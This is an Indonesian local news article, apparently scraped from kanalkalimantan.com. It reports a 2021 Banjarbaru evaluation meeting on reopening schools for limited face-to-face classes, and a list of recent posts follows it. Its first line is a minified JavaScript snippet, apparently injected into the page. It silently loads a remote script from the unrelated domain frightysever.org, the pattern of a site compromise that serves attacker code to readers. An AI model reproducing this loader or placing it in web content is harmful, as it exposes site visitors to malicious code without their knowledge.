(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Kembali ke Sekolah! Kadisdik Banjarbaru: Maksimal Dua Hari Sepekan


KANALKALIMANTAN.COM, BANJARBARU – Kembali ke sekolah alias masuk kelas!. Awal tahun ajaran baru 2021/2022 bisa dipastikan siswa di kota Banjarbaru akan kembali turun ke sekolah.

Sekolah dari jenjang SD dan SMP yang menjadi piloting Pembelajaran Tatap Muka (PTM) melakukan persiapan akhir proses belajar tatap muka di kelas.

Baca juga: Covid-19 Meroket. Tabung Oksigen Langka di Banjarbaru, Orang Cari hingga Tengah Malam!

Dimana awal tahun ajaran baru 2021/2022 di Kota Banjarbaru akan dimulai pada 12 Juli 2021. Recana PTM di sejumlah sekolah di Banjarbaru dibahas Wali Kota Banjarbaru Aditya Mufti Ariffin saat memimpin rapat evaluasi persiapan PTM di aula Gawi Sabarataan Balai Kota Banjarbaru, Senin (28/6/2021).

 

 

Kadisdik Kota Banjarbaru Dr Muhammad Aswan. Foto: humprobanjarbaru

Rapat evaluasi dihadiri Kapolres Banjarbaru AKBP Doni Hadi Santoso, Dandim 1006/Mtp Letkol Inf Imam Muchtarom, Kajari Banjarbaru Andri Irawan, Kepala Dinas Kesehatan Rizana Mirza, Kepala Dinas Pendidikan Dr Muhammad Aswan, Kalak BPBD Banjarbaru, Ketua Ikatan Dokter Anak Indonesia (IDAI) Kota Banjarbaru, Ketua Ikatan Guru Indonesia (IGI) Kota Banjarbaru serta perwakilan PGRI Banjarbaru.

Kepala Dinas Pendidikan Kota Banjarbaru Dr Muhammad Aswan menjelaskan, sesuai Instruksi Presiden bahwa aspek yang harus diperhatikan saat penerapan PTM adalah peserta didik paling banyak 25%.

Baca juga: Walhi Sebut Program Ketahanan Pangan Sejak Soeharto Kerap Gagal karena Ada Aktor Korporasi

“Jadi siswa masuk maksimal dua hari dalam sepekan, 2 jam pelajaran dalam sehari. Itu pun harus ada persetujuan orangtua dan terakhir semua guru harus sudah divaksin,” jelas Kadisdik Banjarbaru.

Sekadar diketahui, jumlah guru di Kota Banjarbaru sebanyak 4.226 orang, sementara yang sudah divaksin sebanyak 3.705 guru.

Sementara itu, Wali Kota Banjarbaru Aditya Mufti Ariffin mengatakan, rapat evaluasi hari ini ingin memastikan sekolah mana yang sudah siap menerapkan proses belajar secara tatap muka. Dinas Pendidikan bersama Satgas Covid-19 Kota Banjarbaru harus memastikan pihak sekolah bisa menerapkan protokol kesehatan.

“Hari ini menentukan sekolah mana yang ditunjuk sebagai piloting PTM, dan bisa melaksanakan protokol kesehatan dengan sebaik-baiknya,” ujarnya.

PTM yang akan dimulai awal tahun ajaran baru, Wali Kota mewanti-wanti, sekolah tidak akan menimbulkan penularan Covid-19 di Kota Banjarbaru.

“BPBD, Dinas Kesehatan dengan Dinas Pendidikan agar kembali melakukan penilaian sekolah-sekolah mana saja yang sarana pra sarana lengkap untuk menggelar PTM,” pungkasnya. (kanalkalimantan.com/dewi)

Reporter : dewi
Editor : bie


Risa

Recent Posts

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

2 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

5 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

5 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

19 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

21 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

24 jam ago

This website uses cookies.